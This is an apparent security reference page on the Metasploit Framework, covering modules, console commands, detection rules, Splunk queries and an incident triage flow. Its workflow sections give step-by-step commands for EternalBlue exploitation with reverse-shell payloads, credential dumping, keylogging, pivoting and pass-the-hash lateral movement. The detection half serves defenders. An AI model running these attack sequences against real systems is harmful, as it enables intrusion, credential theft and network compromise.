Tools

T1203

Metasploit

What Metasploit Framework is, how penetration testers and attackers use its modules for reconnaissance, exploitation, and post-exploitation, and how defenders detect Metasploit activity on their networks.

View on Graph

What Metasploit Is and How It Works

Metasploit is an open-source exploitation framework developed and maintained by Rapid7. It provides a modular platform for developing, testing, and executing exploit code against target systems, and is the tool most commonly used alongside Nmap for port scanning and service discovery before exploitation. The framework bundles hundreds of exploits, thousands of payloads, and dozens of auxiliary and post-exploitation modules into a single command-line console (msfconsole).

MITRE ATT&CK maps exploitation for client execution to T1203 (Exploitation for Client Execution) — Metasploit is the primary tool used for this technique in both authorized penetration tests and real-world attacks. However, Metasploit covers the entire kill chain: T1595 (Active Scanning) for reconnaissance, T1190 (Exploit Public-Facing Application) for exploitation, T1059 (Command and Scripting Interpreter) for post-exploitation, T1003 (OS Credential Dumping) via Mimikatz integration, and T1041 (Exfiltration Over C2 Channel) for data theft.

The framework is written in Ruby with a component architecture that makes it extensible: every exploit, payload, and scanner is a standalone module that can be loaded, configured, and executed independently.


Module Architecture

Every piece of Metasploit is a module. Understanding the module types is the foundation of using the framework effectively.

Module TypePurposeExamples
ExploitDelivers an attack against a specific vulnerability. Each exploit targets a specific CVE on a specific service/OS.exploit/windows/smb/ms17_010_eternalblue, exploit/multi/http/struts2_rest_ognl_injection
PayloadCode that runs on the target after the exploit succeeds. Separated from the exploit so you can mix and match.windows/x64/meterpreter/reverse_tcp, linux/x64/shell_reverse_tcp
AuxiliaryNon-exploit modules: scanners, fuzzers, recon tools. Do not deliver payloads.auxiliary/scanner/portscan/tcp, auxiliary/scanner/smb/smb_login
PostModules that run inside a live session on a compromised host. Privilege escalation, credential dumping, lateral movement.post/windows/gather/hashdump, post/multi/gather/ssh_creds
EncoderObfuscates payloads to evade signature-based detection. Most encoders are largely ineffective against modern EDR.x64/zutto_dekiru, x86/shikata_ga_nai
NOPGenerates NOP (no-operation) sleds for exploit alignment. Rarely needed outside exploit development.x86/opty2, x64/simple

Module Path Convention

Modules are addressed by their full path in category/os/name format:

use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/portscan/tcp
use post/windows/gather/hashdump

The search command accepts keywords, CVE numbers, or module names and supports wildcards:

msf6 > search ms17_010
msf6 > search eternalblue
msf6 > search type:exploit platform:windows cve:2021
msf6 > search type:auxiliary smb_login

Essential msfconsole Commands

These are the commands you use in every Metasploit session:

CommandWhat It DoesExample
searchFind modules by keyword, CVE, platform, or typesearch eternalblue
useLoad a module by pathuse exploit/windows/smb/ms17_010_eternalblue
show optionsList all required and optional parameters for the loaded moduleshow options
show payloadsList compatible payloads for the loaded exploitshow payloads
show targetsList supported target OS versions/configurationsshow targets
setSet a module option valueset RHOSTS 10.0.0.50
setgSet a global option (persists across module switches)setg RHOSTS 10.0.0.0/24
unsetClear a module optionunset PAYLOAD
checkTest if a target is vulnerable without exploitingcheck
run / exploitExecute the loaded modulerun or exploit -j (run as job in background)
sessionsList, interact with, or kill active sessionssessions -l / sessions -i 1
sessions -uUpgrade a shell session to Meterpretersessions -u 1
backgroundBackground the current session (return to msfconsole)Ctrl+Z or background
resourceRun a resource script (automation file)resource /path/to/script.rc
db_nmapRun Nmap from within msfconsole and store results in databasedb_nmap -sV 10.0.0.0/24
hostsList discovered hosts from the databasehosts
servicesList discovered services from the databaseservices
lootList collected data (hashes, screenshots, files)loot
credsList collected credentialscreds
routeAdd a route through a session for pivotingroute add 10.0.1.0/24 1
infoDisplay detailed information about a moduleinfo exploit/windows/smb/ms17_010_eternalblue
backUnload the current moduleback
spoolLog all console output to a filespool /tmp/engagement.log
makeinfoExport session data in a report formatUsed with pro for engagement reporting

Common Exploitation Workflows

Workflow 1: External Reconnaissance to Initial Access

This is the standard external penetration test flow.

1. Port scan the external IP range
   msf6 > db_nmap -sS -sV -O 203.0.113.0/24

2. Check for SMB vulnerabilities (EternalBlue / BlueKeep)
   msf6 > use auxiliary/scanner/smb/smb_ms17_010
   msf6 > set RHOSTS 203.0.113.0/24
   msf6 > run

3. Load the exploit for a confirmed vulnerable host
   msf6 > use exploit/windows/smb/ms17_010_eternalblue
   msf6 > set RHOSTS 203.0.113.50
   msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
   msf6 > set LHOST 10.0.0.10
   msf6 > set LPORT 4444
   msf6 > exploit

4. If success → interactive session established
   meterpreter > sysinfo
   meterpreter > getuid

Key considerations:

  • Use check before exploit to verify a target is vulnerable — avoids crashing a production system with the wrong exploit
  • Set LHOST to your actual listener IP, not a loopback address
  • Use LPORT that is not blocked by firewalls (443 or 80 are common bypass ports)
  • exploit -j runs the listener as a background job, allowing you to continue working on other targets
  • Staged payloads (e.g., meterpreter/reverse_tcp) are smaller and faster, but stageless payloads (e.g., meterpreter_reverse_tcp) handle single-packet delivery

Workflow 2: Post-Exploitation — Reconnaissance and Privilege Escalation

After gaining a Meterpreter session:

1. System reconnaissance
   meterpreter > sysinfo         # OS version, architecture, domain
   meterpreter > getuid           # Current user context
   meterpreter > ipconfig         # Network interfaces and IPs
   meterpreter > arp              # ARP table — peers on the local subnet
   meterpreter > netstat          # Active connections on the host
   meterpreter > ps               # Running processes

2. Check privileges
   meterpreter > getprivs         # List available privileges
   meterpreter > getsystem        # Attempt automatic privilege escalation

3. If getsystem fails, use a local escalation module
   msf6 > use post/windows/escalate/
   # Explore available escalation modules:
   msf6 > search type:post platform:windows escalate

4. Dump credentials
   meterpreter > hashdump         # Dump SAM hashes (requires SYSTEM)
   meterpreter > lsa_dump_secrets # Dump LSA secrets (requires SYSTEM)
   meterpreter > kerberos_ticket_list  # List Kerberos tickets

5. Enable Remote Desktop (if needed)
   meterpreter > run post/windows/manage/enable_rdp

6. Pivot to the internal network
   meterpreter > run autoroute -s 10.0.1.0/24  # Add route through session
   msf6 > route add 10.0.1.0/24 1              # Route traffic through session 1
   # Now exploit internal hosts through the compromised host

Workflow 3: Lateral Movement

Once you have credentials or hashes, move laterally within the network:

1. Use captured hashes for pass-the-hash
   msf6 > use exploit/windows/smb/psexec
   msf6 > set RHOSTS 10.0.1.50
   msf6 > set SMBUser Administrator
   msf6 > set SMBPass <NTLM_HASH>
   msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
   msf6 > set LHOST 10.0.0.10
   msf6 > set LPORT 4455
   msf6 > exploit

2. Use PsExec with explicit credentials
   msf6 > use auxiliary/admin/smb/psexec_command
   msf6 > set RHOSTS 10.0.1.50
   msf6 > set SMBUser DOMAIN\Admin
   msf6 > set SMBPass Password123
   msf6 > set COMMAND whoami
   msf6 > run

3. Use WMI for execution (less logged than PsExec)
   msf6 > use exploit/windows/local/wmi
   # WMI lateral movement is quieter than SMB-based methods

Key Payload Types — Meterpreter and Beyond

Staged vs. Stageless Payloads

Understanding this distinction is critical for evasion.

FeatureStaged (/reverse_tcp)Stageless (_reverse_tcp)
SizeSmall stub (~2 KB)Full payload embedded in one payload (~200-500 KB)
DeliveryStub connects → downloads stage → executesSingle payload delivered, connects, and runs
ReliabilityDepends on stage download workingSelf-contained
Detection riskTwo connections; stage download looks unusualOne larger payload easier to detect inline
Common usageNetwork-based exploitation (browser, SMB)Staged is default for most exploits

Naming convention:

  • windows/x64/meterpreter/reverse_tcpStaged (note the / between stage types)
  • windows/x64/meterpreter_reverse_tcpStageless (note the _ instead of /)

Common Payload Options

PayloadUse Case
windows/x64/meterpreter/reverse_tcpStandard Meterpreter over TCP — most common
windows/x64/meterpreter/reverse_httpsMeterpreter over HTTPS — evades most egress filters
linux/x64/meterpreter/reverse_tcpLinux targets with Meterpreter
java/meterpreter/reverse_tcpCross-platform Java Meterpreter
php/meterpreter/reverse_tcpPHP-based web shells
python/meterpreter/reverse_tcpPython Meterpreter (useful when no compiler)
windows/x64/meterpreter/bind_tcpBind shell (attacker connects to target) — avoid when NAT is present
generic/shell_reverse_tcpSimple reverse shell — no Meterpreter features

Meterpreter Features

Meterpreter provides key features beyond a basic shell:

  • In-memory execution: Meterpreter payloads load entirely in memory. They never write to disk, which evades file-scanner AV.
  • Encrypted communication: Meterpreter sessions communicate over RC4-encrypted TCP or AES-encrypted HTTPS tunnels.
  • Loading post-exploitation modules: No need to upload separate tools — load mimikatz, kiwi, hashdump, screenshare, etc. on demand over the encrypted channel.
  • Anti-forensics: Migration to a trusted process (like explorer.exe or svchost.exe) removes the original injector process.
meterpreter > migrate -N explorer.exe   # Migrate to explorer.exe
meterpreter > load mimikatz             # Load Mimikatz over the channel
meterpreter > kerberos_ticket_list      # List Kerberos tickets
meterpreter > screenshot                # Take a screenshot of the desktop
meterpreter > keyscan_start             # Start keylogging
meterpreter > keyscan_dump              # Dump captured keystrokes

Metasploit Detection — Network and Endpoint

Network-Level Detection

IndicatorWhat to Look ForDetection Method
Meterpreter stagingA small initial connection followed by a large payload download within secondsNetFlow — look for short-lived TCP connections with inconsistent byte counts (small out, large in)
Default port 4444Connections to/from TCP 4444 — Metasploit’s default LPORTNot definitive (attackers change ports) but a strong starting point for triage
Meterpreter HTTPSJA3 fingerprint for Metasploit’s default HTTP clientJA3: 51c64c77f60f8b382d2e9bcd95e55dd1 (Metasploit’s default RC4 cipher suite). Cross-reference with known-threat feeds.
Reverse TCP shellConnection to an external IP that is immediately followed by interactive-looking traffic patterns (irregular timing, small bursts of data)Beaconing analysis — human SSH-like typing patterns over TCP sessions
SMB exploit trafficms17_010_eternalblue — fragmented SMB transactions, trans2 pipes, double-pulsar pingIDS/IPS rules detect EternalBlue and DoublePulsar by packet-level signatures. Snort and Suricata rules (sid:41978 / ET EXPLOIT MS17-010) catch the exploit handshake.

Endpoint-Level Detection

IndicatorWhat to Look ForDetection Method
PowerShell in-memory injectionReflection loading of Meterpreter via PowerShellSysmon Event ID 4104 (PowerShell ScriptBlock logging) — look for [System.Reflection.Assembly]::Load and byte arrays
Process injectionMeterpreter injects into explorer.exe, svchost.exe, winlogon.exeSysmon Event ID 8 (CreateRemoteThread) monitoring for suspicious process injection. Event ID 10 (ProcessAccess) for handle opens across process types
Unusual process creationrundll32.exe, regsvr32.exe, or mshta.exe spawning a network connection without a legitimate parentSysmon Event ID 1 (ProcessCreate) + Event ID 3 (NetworkConnect) correlation
Service installationMetasploit’s psexec module installs a Windows serviceSysmon Event ID 13 (Registry value set — ServiceDLL), Event ID 7045 (new service) in Windows Event Log
Windows Event 4688Process creation from unusual source (e.g., cmd.exe spawned by explorer.exe with network args)Track CommandLine parameters — -enc encoded commands or PowerShell one-liners

Splunk SPL — Metasploit Detection (run in Splunk)

# Meterpreter process injection via Winlogon/explorer
index=windows EventCode=4688
ParentProcessName IN ("*\\winlogon.exe", "*\\explorer.exe", "*\\svchost.exe")
NewProcessName IN ("*\\cmd.exe", "*\\powershell.exe", "*\\rundll32.exe", "*\\regsvr32.exe")
| stats count by ComputerName, User, ParentProcessName, NewProcessName, CommandLine
| sort - count
# PsExec service creation (Metasploit psexec module)
index=windows EventCode=7045
ServiceName IN ("PSEXESVC", "*Service*") OR ServiceName LIKE "%"
ImagePath IN ("*\\psexesvc.exe", "*\\msf*")
| table _time, ComputerName, ServiceName, ImagePath, AccountName
| sort - _time
# SMB exploitation — network connections to suspicious ports
index=network sourcetype=flow
dest_port IN (445, 139, 3389)
| stats sum(bytes) as total_bytes, count by src_ip, dest_ip, dest_port
| where count > 100
| sort - count
# Outbound connections on non-standard high ports
index=network sourcetype=netflow
dest_port > 1024
| where dest_port != 443 AND dest_port != 80 AND dest_port != 8080
| stats count by src_ip, dest_ip, dest_port
| where count > 50
| sort - count

Snort/Suricata Rules — Metasploit Detection

# Detect EternalBlue exploit traffic
alert tcp $HOME_NET any -> $EXTERNAL_NET 445 (
    msg:"ET EXPLOIT MS17-010 SMB Remote Code Execution Attempt";
    flow:to_server,established;
    content:"|ff|SMB|73 00|"; depth:5; offset:4;
    content:"|08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|";
    reference:cve,2017-0144;
    classtype:attempted-admin;
    sid:1000001; rev:1;)

# Detect Meterpreter staging on default port
alert tcp $EXTERNAL_NET any -> $HOME_NET 4444 (
    msg:"ET MALWARE Meterpreter Reverse TCP Connection";
    flow:to_server,established;
    content:"|69 00 6e 00 69 00 74 00|"; depth:64;
    reference:url,github.com/rapid7/metasploit-framework;
    classtype:command-and-control;
    sid:1000002; rev:1;)

Triage Decision Flow — Metasploit Detection

When a detection fires, follow this decision tree to determine if it is active Metasploit activity:

Metasploit detection fired

    ├─ Is there a confirmed exploit? (EternalBlue, BlueKeep, web app RCE)
    │   ├─ Yes → Proceed to containment immediately
    │   └─ No → Is there a Meterpreter session?

    ├─ Meterpreter session evidence:
    │   ├─ Process injection into svchost.exe or explorer.exe
    │   ├─ Encrypted TCP/HTTPS connection from the injected process
    │   └─ Concurrent connections to unknown external IPs

    ├─ Containment actions:
    │   ├─ Isolate the compromised host (network quarantine VLAN)
    │   ├─ Kill the Meterpreter process (use [Sysinternals](/tools/sysinternals) Process Explorer)
    │   ├─ Block the C2 IP/domain at the firewall
    │   └─ Collect a memory dump for forensics

    └─ After containment:
        ├─ Determine initial access vector (phishing? unpatched service?)
        ├─ Check lateral movement — has psexec or WMI been used from this host?
        ├─ Dump credentials — were hashes stolen? Are other hosts at risk?
        └─ Full incident response: reimage, rotate all domain passwords, audit persistence

Sources